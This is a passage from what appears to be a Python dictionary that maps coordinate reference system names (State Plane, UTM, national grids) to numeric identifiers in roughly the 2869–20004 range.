'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203_Feet_Intl': 2869, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401_Feet': 2870, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402_Feet': 2871, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403_Feet': 2872, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404_Feet': 2873, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405_Feet': 2874, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406_Feet': 2875, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501_Feet': 2876, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502_Feet': 2877, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503_Feet': 2878, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600_Feet': 2879, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700_Feet': 2880, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901_Feet': 2881, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902_Feet': 2882, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903_Feet': 2883, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001_Feet': 2884, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002_Feet': 2885, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101_Feet': 2886, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102_Feet': 2887, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103_Feet': 2888, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601_Feet': 2891, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602_Feet': 2892, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900_Feet': 2893, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 2894, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 2895, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111_Feet_Intl': 2896, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112_Feet_Intl': 2897, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113_Feet_Intl': 2898, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301_Feet': 2899, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302_Feet': 2900, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500_Feet_Intl': 2901, 
'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001_Feet': 2902, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 2903, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003_Feet': 2904, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101_Feet': 2905, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102_Feet': 2906, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103_Feet': 2907, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 2908, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301_Feet_Intl': 2909, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302_Feet_Intl': 2910, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501_Feet': 2911, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502_Feet': 2912, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601_Feet_Intl': 2913, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602_Feet_Intl': 2914, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100_Feet': 2915, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201_Feet': 2916, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202_Feet': 2917, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203_Feet': 2918, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204_Feet': 2919, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205_Feet': 2920, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301_Feet_Intl': 2921, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302_Feet_Intl': 2922, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303_Feet_Intl': 2923, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501_Feet': 2924, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502_Feet': 2925, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601_Feet': 2926, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602_Feet': 2927, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801_Feet': 2928, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 2929, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803_Feet': 2930, 'Beduaram_TM_13_NE': 2931, 'QND_1995_Qatar_National_Grid': 2932, 'Gunung_Segara_UTM_Zone_50S': 
2933, 'Pulkovo_1942_CS63_Zone_A1': 2935, 'Pulkovo_1942_CS63_Zone_A2': 2936, 'Pulkovo_1942_CS63_Zone_A3': 2937, 'Pulkovo_1942_CS63_Zone_A4': 2938, 'Pulkovo_1942_CS63_Zone_K2': 2939, 'Pulkovo_1942_CS63_Zone_K3': 2940, 'Pulkovo_1942_CS63_Zone_K4': 2941, 'Porto_Santo_1936_UTM_Zone_28N': 2942, 'Selvagem_Grande_1938_UTM_Zone_28N': 2943, 'NAD_1983_CSRS_MTM_2_SCoPQ': 2944, 'NAD_1983_CSRS_MTM_3': 2945, 'NAD_1983_CSRS_MTM_4': 2946, 'NAD_1983_CSRS_MTM_5': 2947, 'NAD_1983_CSRS_MTM_6': 2948, 'NAD_1983_CSRS_MTM_7': 2949, 'NAD_1983_CSRS_MTM_8': 2950, 'NAD_1983_CSRS_MTM_9': 2951, 'NAD_1983_CSRS_MTM_10': 2952, 'NAD_1983_CSRS_New_Brunswick_Stereographic': 2953, 'NAD_1983_CSRS_Prince_Edward_Island': 2954, 'NAD_1983_CSRS_UTM_Zone_11N': 2955, 'NAD_1983_CSRS_UTM_Zone_12N': 2956, 'NAD_1983_CSRS_UTM_Zone_13N': 2957, 'NAD_1983_CSRS_UTM_Zone_17N': 2958, 'NAD_1983_CSRS_UTM_Zone_18N': 2959, 'NAD_1983_CSRS_UTM_Zone_19N': 2960, 'NAD_1983_CSRS_UTM_Zone_20N': 2961, 'NAD_1983_CSRS_UTM_Zone_21N': 2962, 'NAD_1927_Alaska_Albers_Feet': 2964, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 2965, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 2966, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301_Feet': 2967, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302_Feet': 2968, 'Fort_Marigot_UTM_20N': 2969, 'Sainte_Anne_UTM_20N': 2970, 'CSG_1967_UTM_22N': 2971, 'RGFG_1995_UTM_22N': 2972, 'Fort_Desaix_UTM_20N': 2973, 'RGR_1992_UTM_40S': 2975, 'Tahiti_1952_UTM_6S': 2976, 'Tahaa_1954_UTM_5S': 2977, 'IGN72_Nuku_Hiva_UTM_7S': 2978, 'K0_1949_UTM_42S': 2979, 'Combani_1950_UTM_38S': 2980, 'IGN56_Lifou_UTM_58S': 2981, 'IGN72_Grande_Terre_UTM_58S': 2982, 'RGNC_1991_Lambert_New_Caledonia': 2984, 'Petrels_1972_Terre_Adelie_Polar_Stereographic': 2985, 'Perroud_1950_Terre_Adelie_Polar_Stereographic': 2986, 'Saint_Pierre_et_Miquelon_1950_UTM_21N': 2987, 'MOP78_UTM_1S': 2988, 'RRAF_1991_UTM_20N': 2989, 'NAD_1983_Oregon_Statewide_Lambert': 2991, 'NAD_1983_Oregon_Statewide_Lambert_Feet_Intl': 2992, 
'NAD_1983_HARN_Oregon_Statewide_Lambert': 2993, 'NAD_1983_HARN_Oregon_Statewide_Lambert_Feet_Intl': 2994, 'IGN53_Mare_UTM_58S': 2995, 'ST84_Ile_des_Pins_UTM_58S': 2996, 'ST71_Belep_UTM_58S': 2997, 'NEA74_Noumea_UTM_58S': 2998, 'Grand_Comoros_UTM_38S': 2999, 'Gunung_Segara_NEIEZ': 3000, 'Batavia_NEIEZ': 3001, 'Makassar_NEIEZ': 3002, 'Monte_Mario_Italy_1': 3003, 'Monte_Mario_Italy_2': 3004, 'NAD_1983_BC_Environment_Albers': 3005, 'SWEREF99_TM': 3006, 'SWEREF99_12_00': 3007, 'SWEREF99_13_30': 3008, 'SWEREF99_15_00': 3009, 'SWEREF99_16_30': 3010, 'SWEREF99_18_00': 3011, 'SWEREF99_14_15': 3012, 'SWEREF99_15_45': 3013, 'SWEREF99_17_15': 3014, 'SWEREF99_18_45': 3015, 'SWEREF99_20_15': 3016, 'SWEREF99_21_45': 3017, 'SWEREF99_23_15': 3018, 'RT90_75_gon_V': 3019, 'RT90_5_gon_V': 3020, 'RT90_25_gon_V': 3021, 'RT90_0_gon': 3022, 'RT90_25_gon_O': 3023, 'RT90_5_gon_O': 3024, 'RT38_75_gon_V': 3025, 'RT38_5_gon_V': 3026, 'RT38_25_gon_V': 3027, 'RT38_0_gon': 3028, 'RT38_25_gon_O': 3029, 'RT38_5_gon_O': 3030, 'WGS_1984_Antarctic_Polar_Stereographic': 3031, 'WGS_1984_Australian_Antarctic_Polar_Stereographic': 3032, 'WGS_1984_Australian_Antarctic_Lambert': 3033, 'ETRS_1989_LCC': 3034, 'ETRS_1989_LAEA': 3035, 'Moznet_UTM_Zone_36S': 3036, 'Moznet_UTM_Zone_37S': 3037, 'Hjorsey_1955_UTM_Zone_26N': 3054, 'Hjorsey_1955_UTM_Zone_27N': 3055, 'Hjorsey_1955_UTM_Zone_28N': 3056, 'ISN_1993_Lambert_1993': 3057, 'Helle_1954_Jan_Mayen_Grid': 3058, 'LKS_1992_Latvia_TM': 3059, 'IGN72_Grande_Terre_UTM_58S': 3060, 'Porto_Santo_1995_UTM_Zone_28N': 3061, 'Azores_Oriental_1995_UTM_Zone_26N': 3062, 'Azores_Central_1995_UTM_Zone_26N': 3063, 'IGM_1995_UTM_Zone_32N': 3064, 'IGM_1995_UTM_Zone_33N': 3065, 'ED_1950_Jordan_TM': 3066, 'EUREF_FIN_TM35FIN': 3067, 'DHDN_Soldner_Berlin': 3068, 'NAD_1927_Wisconsin_TM': 3069, 'NAD_1983_Wisconsin_TM': 3070, 'NAD_1983_HARN_Wisconsin_TM': 3071, 'NAD_1983_Maine_2000_East_Zone': 3072, 'NAD_1983_Maine_2000_Central_Zone': 3073, 'NAD_1983_Maine_2000_West_Zone': 3074, 
'NAD_1983_HARN_Maine_2000_East_Zone': 3075, 'NAD_1983_HARN_Maine_2000_Central_Zone': 3076, 'NAD_1983_HARN_Maine_2000_West_Zone': 3077, 'NAD_1983_Michigan_GeoRef_Meters': 3078, 'NAD_1983_HARN_Michigan_GeoRef_Meters': 3079, 'NAD_1927_Texas_Statewide_Mapping_System': 3080, 'NAD_1983_Texas_Statewide_Mapping_System': 3081, 'NAD_1983_Texas_Centric_Mapping_System_Lambert': 3082, 'NAD_1983_Texas_Centric_Mapping_System_Albers': 3083, 'NAD_1983_HARN_Texas_Centric_Mapping_System_Lambert': 3084, 'NAD_1983_HARN_Texas_Centric_Mapping_System_Albers': 3085, 'NAD_1983_Florida_GDL_Albers': 3086, 'NAD_1983_HARN_Florida_GDL_Albers': 3087, 'NAD_1983_StatePlane_Kentucky_FIPS_1600': 3088, 'NAD_1983_StatePlane_Kentucky_FIPS_1600_Feet': 3089, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600': 3090, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600_Feet': 3091, 'Tokyo_UTM_Zone_51N': 3092, 'Tokyo_UTM_Zone_52N': 3093, 'Tokyo_UTM_Zone_53N': 3094, 'Tokyo_UTM_Zone_54N': 3095, 'Tokyo_UTM_Zone_55N': 3096, 'JGD_2000_UTM_Zone_51N': 3097, 'JGD_2000_UTM_Zone_52N': 3098, 'JGD_2000_UTM_Zone_53N': 3099, 'JGD_2000_UTM_Zone_54N': 3100, 'JGD_2000_UTM_Zone_55N': 3101, 'Samoa_1962_Samoa_Lambert': 3102, 'Gulshan_303_Bangladesh_TM': 3106, 'GDA_1994_South_Australia_Lambert': 3107, 'ETRS_1989_Guernsey_Grid': 3108, 'ETRS_1989_Jersey_Transverse_Mercator': 3109, 'AGD_1966_VICGRID': 3110, 'GDA_1994_VICGRID94': 3111, 'GDA_1994_Geoscience_Australia_Lambert': 3112, 'GDA_1994_BCSG02': 3113, 'MAGNA_Colombia_Oeste_Oeste': 3114, 'MAGNA_Colombia_Oeste': 3115, 'MAGNA_Colombia_Bogota': 3116, 'MAGNA_Colombia_Este': 3117, 'MAGNA_Colombia_Este_Este': 3118, 'Douala_1948_AEF_West': 3119, 'Pulkovo_1942_Adj_1958_Poland_Zone_I': 3120, 'Philippines_Zone_I': 3121, 'Philippines_Zone_II': 3122, 'Philippines_Zone_III': 3123, 'Philippines_Zone_IV': 3124, 'Philippines_Zone_V': 3125, 'ETRS_1989_ETRS-GK19FIN': 3126, 'ETRS_1989_ETRS-GK20FIN': 3127, 'ETRS_1989_ETRS-GK21FIN': 3128, 'ETRS_1989_ETRS-GK22FIN': 3129, 'ETRS_1989_ETRS-GK23FIN': 3130, 
'ETRS_1989_ETRS-GK24FIN': 3131, 'ETRS_1989_ETRS-GK25FIN': 3132, 'ETRS_1989_ETRS-GK26FIN': 3133, 'ETRS_1989_ETRS-GK27FIN': 3134, 'ETRS_1989_ETRS-GK28FIN': 3135, 'ETRS_1989_ETRS-GK29FIN': 3136, 'ETRS_1989_ETRS-GK30FIN': 3137, 'ETRS_1989_ETRS-GK31FIN': 3138, 'Fiji_1956_UTM_Zone_60S': 3141, 'Fiji_1956_UTM_Zone_1S': 3142, 'Indian_1960_UTM_Zone_48N': 3148, 'Indian_1960_UTM_Zone_49N': 3149, 'NAD_1983_CSRS_BC_Environment_Albers': 3153, 'NAD_1983_CSRS_UTM_Zone_7N': 3154, 'NAD_1983_CSRS_UTM_Zone_8N': 3155, 'NAD_1983_CSRS_UTM_Zone_9N': 3156, 'NAD_1983_CSRS_UTM_Zone_10N': 3157, 'NAD_1983_CSRS_UTM_Zone_14N': 3158, 'NAD_1983_CSRS_UTM_Zone_15N': 3159, 'NAD_1983_CSRS_UTM_Zone_16N': 3160, 'NAD_1983_Ontario_MNR_Lambert': 3161, 'NAD_1983_CSRS_Ontario_MNR_Lambert': 3162, 'RGNC_1991_93_Lambert_New_Caledonia': 3163, 'ST87_Ouvea_UTM_58S': 3164, 'NEA74_Noumea_Lambert': 3165, 'NEA74_Noumea_Lambert_2': 3166, 'RGNC_1991-93_UTM_Zone_57S': 3169, 'RGNC_1991-93_UTM_Zone_58S': 3170, 'RGNC_1991-93_UTM_Zone_59S': 3171, 'IGN53_Mare_UTM_Zone_59S': 3172, 'NAD_1983_Great_Lakes_Basin_Albers': 3174, 'NAD_1983_Great_Lakes_and_St_Lawrence_Albers': 3175, 'Indian_1960_TM_106NE': 3176, 'LGD2006_Libya_TM': 3177, 'Greenland_1996_UTM_Zone_18N': 3178, 'Greenland_1996_UTM_Zone_19N': 3179, 'Greenland_1996_UTM_Zone_20N': 3180, 'Greenland_1996_UTM_Zone_21N': 3181, 'Greenland_1996_UTM_Zone_22N': 3182, 'Greenland_1996_UTM_Zone_23N': 3183, 'Greenland_1996_UTM_Zone_24N': 3184, 'Greenland_1996_UTM_Zone_25N': 3185, 'Greenland_1996_UTM_Zone_26N': 3186, 'Greenland_1996_UTM_Zone_27N': 3187, 'Greenland_1996_UTM_Zone_28N': 3188, 'Greenland_1996_UTM_Zone_29N': 3189, 'LGD2006_Libya_TM_Zone_5': 3190, 'LGD2006_Libya_TM_Zone_6': 3191, 'LGD2006_Libya_TM_Zone_7': 3192, 'LGD2006_Libya_TM_Zone_8': 3193, 'LGD2006_Libya_TM_Zone_9': 3194, 'LGD2006_Libya_TM_Zone_10': 3195, 'LGD2006_Libya_TM_Zone_11': 3196, 'LGD2006_Libya_TM_Zone_12': 3197, 'LGD2006_Libya_TM_Zone_13': 3198, 'LGD2006_UTM_Zone_32N': 3199, 'FD_1958_Iraq': 3200, 
'LGD2006_UTM_Zone_33N': 3201, 'LGD2006_UTM_Zone_34N': 3202, 'LGD2006_UTM_Zone_35N': 3203, 'WGS_1984_USGS_Transantarctic_Mountains': 3294, 'RGPF_UTM_Zone_5S': 3296, 'RGPF_UTM_Zone_6S': 3297, 'RGPF_UTM_Zone_7S': 3298, 'RGPF_UTM_Zone_8S': 3299, 'Estonian_Coordinate_System_of_1992': 3300, 'Estonia_1997_Estonia_National_Grid': 3301, 'IGN63_Hiva_Oa_UTM_Zone_7S': 3302, 'Fatu_Iva_1972_UTM_Zone_7S': 3303, 'Tahiti_1979_UTM_Zone_6S': 3304, 'Moorea_1987_UTM_Zone_6S': 3305, 'Maupiti_1983_UTM_Zone_5S': 3306, 'Nakhl-e_Ghanem_UTM_Zone_39N': 3307, 'GDA_1994_NSW_lambert': 3308, 'NAD_1927_California_Teale_Albers': 3309, 'NAD_1983_California_Teale_Albers': 3310, 'NAD_1983_HARN_California_Teale_Albers': 3311, 'CSG_1967_UTM_Zone_21N': 3312, 'RGFG_1995_UTM_Zone_21N': 3313, 'Katanga_1955_Katanga_Lambert': 3314, 'Katanga_1955_Katanga_TM': 3315, 'Kasai_1953_Congo_TM_Zone_22': 3316, 'Kasai_1953_Congo_TM_Zone_24': 3317, 'IGC_1962_Congo_TM_Zone_12': 3318, 'IGC_1962_Congo_TM_Zone_14': 3319, 'IGC_1962_Congo_TM_Zone_16': 3320, 'IGC_1962_Congo_TM_Zone_18': 3321, 'IGC_1962_Congo_TM_Zone_20': 3322, 'IGC_1962_Congo_TM_Zone_22': 3323, 'IGC_1962_Congo_TM_Zone_24': 3324, 'IGC_1962_Congo_TM_Zone_26': 3325, 'IGC_1962_Congo_TM_Zone_28': 3326, 'IGC_1962_Congo_TM_Zone_30': 3327, 'Pulkovo_1942_Adj_1958_GUGiK-80': 3328, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_5': 3329, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_6': 3330, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_7': 3331, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_8': 3332, 'Pulkovo_1942_Adj_1958_GK_Zone_3': 3333, 'Pulkovo_1942_Adj_1958_GK_Zone_4': 3334, 'Pulkovo_1942_Adj_1958_GK_Zone_5': 3335, 'Kerguelen_Island_1949_UTM_42S': 3336, 'Le_Pouce_1934_Mauritius_Grid': 3337, 'NAD_1983_Alaska_Albers': 3338, 'IGCB_1955_Congo_TM_Zone_12': 3339, 'IGCB_1955_Congo_TM_Zone_14': 3340, 'IGCB_1955_Congo_TM_Zone_16': 3341, 'IGCB_1955_UTM_Zone_33S': 3342, 'Mauritania_1999_UTM_Zone_28N': 3343, 'Mauritania_1999_UTM_Zone_29N': 3344, 'Mauritania_1999_UTM_Zone_30N': 3345, 
'LKS_1994_Lithuania_TM': 3346, 'NAD_1983_Statistics_Canada_Lambert': 3347, 'NAD_1983_CSRS_Statistics_Canada_Lambert': 3348, 'WGS_1984_PDC_Mercator': 3349, 'Pulkovo_1942_CS63_Zone_K0': 3350, 'Pulkovo_1942_CS63_Zone_K1': 3351, 'Pulkovo_1942_CS63_Zone_K2': 3352, 'Mhast_Onshore_UTM_Zone_32S': 3353, 'Mhast_Offshore_UTM_Zone_32S': 3354, 'Egypt_Gulf_of_Suez_S-650_TL_Red_Belt': 3355, 'Grand_Cayman_1959_UTM_Zone_17N': 3356, 'Little_Cayman_1961_UTM_Zone_17N': 3357, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200': 3358, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200_Feet': 3359, 'NAD_1983_HARN_StatePlane_South_Carolina_FIPS_3900': 3360, 'NAD_1983_HARN_StatePlane_South_Carolina_FIPS_3900_Feet_Intl': 3361, 'NAD_1983_HARN_StatePlane_Pennsylvania_North_FIPS_3701': 3362, 'NAD_1983_HARN_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 3363, 'NAD_1983_HARN_StatePlane_Pennsylvania_South_FIPS_3702': 3364, 'NAD_1983_HARN_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 3365, 'Hong_Kong_1963_Grid_System': 3366, 'IGN_Astro_1960_UTM_Zone_28N': 3367, 'IGN_Astro_1960_UTM_Zone_29N': 3368, 'IGN_Astro_1960_UTM_Zone_30N': 3369, 'NAD_1927_UTM_Zone_59N': 3370, 'NAD_1927_UTM_Zone_60N': 3371, 'NAD_1983_UTM_Zone_59N': 3372, 'NAD_1983_UTM_Zone_60N': 3373, 'FD_1954_UTM_Zone_29N': 3374, 'GDM_2000_MRSO_Peninsular_Malaysia': 3375, 'GDM_2000_BRSO_East_Malaysia': 3376, 'GDM_2000_State_Cassini_Johor': 3377, 'GDM_2000_State_Cassini_Negeri_Sembilan_&_Melaka': 3378, 'GDM_2000_State_Cassini_Pahang': 3379, 'GDM_2000_State_Cassini_Selangor': 3380, 'GDM_2000_State_Cassini_Terengganu': 3381, 'GDM_2000_State_Cassini_Pulau_Pinang_&_Seberang_Perai': 3382, 'GDM_2000_State_Cassini_Perlis': 3383, 'GDM_2000_State_Cassini_Perak': 3384, 'GDM_2000_State_Cassini_Kelantan': 3385, 'KKJ_Finland_Zone_0': 3386, 'KKJ_Finland_Zone_5': 3387, 'Pulkovo_1942_Caspian_Sea_Mercator': 3388, 'Karbala_1979_Polservice_UTM_Zone_37N': 3391, 'Karbala_1979_Polservice_UTM_Zone_38N': 3392, 'Karbala_1979_Polservice_UTM_Zone_39N': 3393, 
'Nahrwan_1934_Iraq_Zone': 3394, 'WGS_1984_World_Mercator': 3395, 'PD/83_GK_Zone_3': 3396, 'PD/83_GK_Zone_4': 3397, 'RD/83_GK_Zone_4': 3398, 'RD/83_GK_Zone_5': 3399, 'NAD_1983_10TM_AEP_Forest': 3400, 'NAD_1983_10TM_AEP_Resource': 3401, 'NAD_1983_CSRS_10TM_AEP_Forest': 3402, 'NAD_1983_CSRS_10TM_AEP_Resource': 3403, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200_Feet': 3404, 'VN_2000_UTM_Zone_48N': 3405, 'VN_2000_UTM_Zone_49N': 3406, 'Hong_Kong_1963_Grid_System': 3407, 'NSIDC_EASE_Grid_North': 3408, 'NSIDC_EASE_Grid_South': 3409, 'NSIDC_EASE_Grid_Global': 3410, 'NSIDC_Sea_Ice_Polar_Stereographic_North': 3411, 'NSIDC_Sea_Ice_Polar_Stereographic_South': 3412, 'WGS_1984_NSIDC_Sea_Ice_Polar_Stereographic_North': 3413, 'SVY21_Singapore_TM': 3414, 'WGS_1972_BE_South_China_Sea_Lambert': 3415, 'ETRS_1989_Austria_Lambert': 3416, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401_Feet': 3417, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402_Feet': 3418, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501_Feet': 3419, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502_Feet': 3420, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701_Feet': 3421, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702_Feet': 3422, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703_Feet': 3423, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900_Feet': 3424, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401_Feet': 3425, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402_Feet': 3426, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501_Feet': 3427, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502_Feet': 3428, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701_Feet': 3429, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702_Feet': 3430, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703_Feet': 3431, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900_Feet': 3432, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301_Feet': 3433, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302_Feet': 3434, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201_Feet': 3435, 
'NAD_1983_StatePlane_Illinois_West_FIPS_1202_Feet': 3436, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800_Feet': 3437, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800_Feet': 3438, 'PDO_1993_UTM_Zone_39N': 3439, 'PDO_1993_UTM_Zone_40N': 3440, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301_Feet': 3441, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302_Feet': 3442, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201_Feet': 3443, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202_Feet': 3444, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800_Feet': 3445, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800_Feet': 3446, 'Belge_Lambert_2005': 3447, 'JAD_2001_Jamaica_Grid': 3448, 'JAD_2001_UTM_Zone_17N': 3449, 'JAD_2001_UTM_Zone_18N': 3450, 'NAD_1983_StatePlane_Louisiana_Offshore_FIPS_1703_Feet': 3453, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701_Feet': 3456, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702_Feet': 3457, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001_Feet': 3458, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002_Feet': 3459, 'Fiji_1986_Fiji_Map_Grid': 3460, 'Dabola_1981_UTM_Zone_28N': 3461, 'Dabola_1981_UTM_Zone_29N': 3462, 'NAD_1983_Maine_2000_Central_Zone': 3463, 'NAD_1983_HARN_Maine_2000_Central_Zone': 3464, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet': 3560, 'Old_Hawaiian_StatePlane_Hawaii_1_FIPS_5101': 3561, 'Old_Hawaiian_StatePlane_Hawaii_2_FIPS_5102': 3562, 'Old_Hawaiian_StatePlane_Hawaii_3_FIPS_5103': 3563, 'Old_Hawaiian_StatePlane_Hawaii_4_FIPS_5104': 3564, 'Old_Hawaiian_StatePlane_Hawaii_5_FIPS_5105': 3565, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet': 3566, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet': 3567, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301_Feet': 3568, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302_Feet': 3569, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303_Feet': 3570, 'WGS_1984_North_Pole_LAEA_Bering_Sea': 3571, 'WGS_1984_North_Pole_LAEA_Alaska': 3572, 'WGS_1984_North_Pole_LAEA_Canada': 3573, 
'WGS_1984_North_Pole_LAEA_Atlantic': 3574, 'WGS_1984_North_Pole_LAEA_Europe': 3575, 'WGS_1984_North_Pole_LAEA_Russia': 3576, 'GDA_1994_Australia_Albers': 3577, 'NAD_1983_Yukon_Albers': 3578, 'NAD_1983_CSRS_Yukon_Albers': 3579, 'NAD_1983_Northwest_Territories_Lambert': 3580, 'NAD_1983_CSRS_Northwest_Territories_Lambert': 3581, 'Reunion_1947_TM_Reunion': 3727, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401_Feet': 3734, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402_Feet': 3735, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901_Feet': 3736, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 3737, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 3738, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904_Feet': 3739, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401_Feet': 3753, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402_Feet': 3754, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901_Feet': 3755, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 3756, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 3757, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904_Feet': 3758, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103_Feet': 3759, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103_Feet': 3760, 'NAD_1983_CSRS_UTM_Zone_22N': 3761, 'WGS_1984_South_Georgia_Lambert': 3762, 'ETRS_1989_Portugal_TM06': 3763, 'Puerto_Rico_UTM_Zone_20N': 3920, 'Puerto_Rico_StatePlane_Puerto_Rico_FIPS_5201': 3991, 'Puerto_Rico_StatePlane_Virgin_Islands_St_Croix_FIPS_5202': 3992, 'Pulkovo_1995_GK_Zone_2': 20002, 'Pulkovo_1995_GK_Zone_3': 20003, 'Pulkovo_1995_GK_Zone_4': 20004, 